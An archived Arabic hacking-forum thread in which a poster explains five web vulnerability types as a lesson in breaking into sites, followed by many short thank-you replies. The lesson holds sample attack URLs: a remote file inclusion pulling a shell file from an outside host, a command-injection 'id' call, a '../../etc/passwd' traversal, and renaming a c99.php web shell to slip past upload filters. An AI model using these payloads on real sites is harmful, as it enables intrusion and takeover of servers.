المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : الدرس الثاني شرح أنواع الثغرات ومفاهيمها



ASDELY-ScOrPiOn
07-21-2009, 10:38 AM
السلام عليكم ورحمة الله وبركاته



وصلنا والحمدلله لدرس الثاني في الدورة وهي ((شرح أنواع الثغرات ومفاهيمها))

أنواع الثغرات وهي :

1- Remote File Inclusion إختصارها RFI
Remote Command Execution -2
SQL -3
Local File Inclution -4 إختصارها LFI
Remote Upload Vulnerability -5

امممم نبداء بشرح كلا منها :)

=================================================

النوع الأول هي ثغرة تسمح لك بسحب الشل من خارج الموقع الى الموقع عن طريق الرابط مثلا


www.sec-t.com/index.php?id=http://site.com/shell.txt?

اذا كان الملف مصاب بثغرة include سوف يتم سحب الشل عن طريق وضع رابط الشل
خلف علامة = بعد الرابط يجب ان نضع علامة ؟

اذا كانت الثغرة شغالة سيتم سحب الشل

اممم واحد بيسألني ماهو الشل
الشل يا طويل العمر هو ملف مبرمج بلغة PHP ترفعه اذا وجدت ثغرة ويسمح لك بالتحكم بالموقع كاملا كأنك صاحب الموقع وسنشرحه في الدروس القادمه
لأنه اساس الإختراق من ثغرات الـ web application

ملاحظة : ثغرات include قد شارفت على الإنقراض وبقية منها 2% فقط من جميع المواقع على الشبكة

يعني لو الثغرة كانت موجودة لو شرحت عليها مع التطبيق

=================================

الأن نروح لنوع الثاني وهو Remote Command Execution

هاذي الثغرة تعجبني جدا وهي ثغرة تسمح لك بتنفيذ اوامر على السيرفر اوامر نظام التشغيل لينكس

مثلا



www.xxxx.com/index.php?=id

اذا كانت الثغرة مصابه سوف تسمح لنا بتنفيذ الأوامر بوضع الأمر بعد علامة =

انا وضعت الأمر id وهو الأمر الذي يظهر صلاحيتي على السيرفر وانشالله نفهم اكثر في الدروس القادمه

==================================

النوع الثلاث وهو SQL بالعربي تسمى ثغرات الحقن اي انك تحقن قواعد البيانات بأوامر لتستخرج منها معلومات قيمة جداا

مثل باسورد ويوزر الأدمن المخزنة في القاعدة الخاصه بالسكريبت

وهي الثغرة الأكثر شعبية واستعمالا الأن وقد تم الإطاحه بكبار المواقع مثل موقع الكاسبر سكاي و موقع مايكرسوفت بهاذه

الثغرة و سيتم شرح استغلالها وتطبيقها بشرح مخصص لأنها ثغرة عظيمة تحتاج لفيديو او درس خاااص :)

وتتواجد في أكثر من لغة برمجية كـ PHP و asp

==================================

النوع الرابع وهو Local File Inclution وهاذيه الثغرة تسمح لك بقراءة ملفات على السيرفر

مثل ملف etc/passwd وهو الملف الذي يحفظ يوزرات المواقع وطريقة الإستغلال هي


www.xxx.com/index.php?=../../../../../etc/passwd

وطبعا كما تعودنا بعد علامة = نضع هذا الإستغلال ../../../../../etc/passwd

ماذا تعني ../

هذي تعني خطوة للخلف اي اذا كنا على هذا المسار vb/includes ووضعنا هذا الأمر بالإستغلال ../ سوف يتغير
مسارنا لمجلد /vb/ مع الدروس القادمه سوف تفهمون انشالله كما قلت انه درس لفهم انواع ومفاهيم الثغرات
وطرق عملها

================================

النوع الخامس ولأخير وهو Remote Upload Vulnerability

وهي ثغرات مراكز رفع الملفات فبعض المرمجين الغير مباليين يسمح لك برفع امتداد php كما عرفنا انه الشل يكون ملف مبرمج
بلغة php اي امتداده ايضا php فهذا يسمح لنا برفع الشل مثلا شل بإسم c99.php

وهناك ايضا بعض مراكز التحميل التي يمكن خداعها ففي بعضي الأحيان نجد مركز رفع يسمح لك برفع امتداد

gif و jpg و rar و zip

فبذالك يمكن خذاع المركز بإعادة تسمية الشل من c99.php الى c99.php.rar او c99.php.gif

وسيتم الرفع و سأشرحه في درس مفصل مع التطبيق لووول :)

وبهذا ننهي الدرس لهاذا اليوم واتمنى انا اكون قد وفيت في الشرح

موج الأحزان
07-22-2009, 03:31 AM
ياسلام عليك

يالسبع


على القوهـ

black11
07-22-2009, 09:23 PM
مشكور الله يعطيك العافية ..
تقبل مروري

اسد سوريا
09-15-2009, 05:54 AM
شكرا ومنتظرين جديدك

اوبشن
09-16-2009, 07:40 AM
تسلم يا المدير

و إلى الأمام

ABOALLEL
09-20-2009, 09:56 AM
مشكور وبارك الله فيك

روكي راكاك
10-09-2009, 02:52 AM
يسلمواااااااااااااااااااا اا

BLACK ANGIL
08-26-2010, 11:37 AM
مشكور على المجهود

الغبري
08-26-2010, 06:10 PM
ياسلام عليك يابطل منتظرين الدروس القادم كفو يالذيب

dark_ma
01-02-2011, 11:34 AM
مشكووووووووووووووووور يا غالي

Black Spider
01-16-2011, 10:58 AM
بارك الله فيك اخي

Bifrost
01-16-2011, 11:35 AM
تشكر حبي http://h1.ripway.com/huseein/20060207_054109+2.jpg

zaina
01-17-2011, 02:38 AM
ياسلام عليك يابطل منتظرين الدروس القادم

satan-jxx
01-17-2011, 12:10 PM
http://i66.servimg.com/u/f66/14/16/50/10/1010.gif

http://i66.servimg.com/u/f66/14/16/50/10/ff13110.gif
.......
.....
...
.

سلمت يداك وكتبها الله في ميزان حسناتك نتمنا ان نرى المزيد من ابداعاتك الجميلة والرائعة

تمنياتي لك بالتوفيق والنجاح تقبل مروري



http://i66.servimg.com/u/f66/14/16/50/10/620-jz10.gif

منتديات جيوش الهكرز
جيوش الهكر أكبر منتدى هكر عربي مختص بتعليم الاختراق والحماية
لا حدود للمعرفة لا حدود للاختراق لا حدود للاحتراف
www.aljyyosh.com (http://www.aljyyosh.com)
.
...
.....
.......

http://i66.servimg.com/u/f66/14/16/50/10/ff13110.gif

http://i66.servimg.com/u/f66/14/16/50/10/810.gif

محمد_هكر
01-17-2011, 02:25 PM
مشكوررررررررررررررررررررر رر

omarezzeddine25
06-07-2011, 10:42 PM
تسلم يا المدير

و إلى الأمام

dodohacker-killer
06-08-2011, 09:08 PM
توقيع جميل يا عبد اللطيف

Net-Worm
06-08-2011, 10:04 PM
موضوع جميل زادك الله علما اخي

mr.e3dam
07-28-2011, 12:57 PM
مشكووووووووووووووووووووور على كل هاذي الموااضيع

وشروحاااتك كافيه ووافيه

تقبل مروري

lebanon111
11-17-2011, 07:20 PM
انت اول شخص بفهم الدرس عنده شرحك كتير حلو يا ريت تكمل بائي الدروس بالهطريقة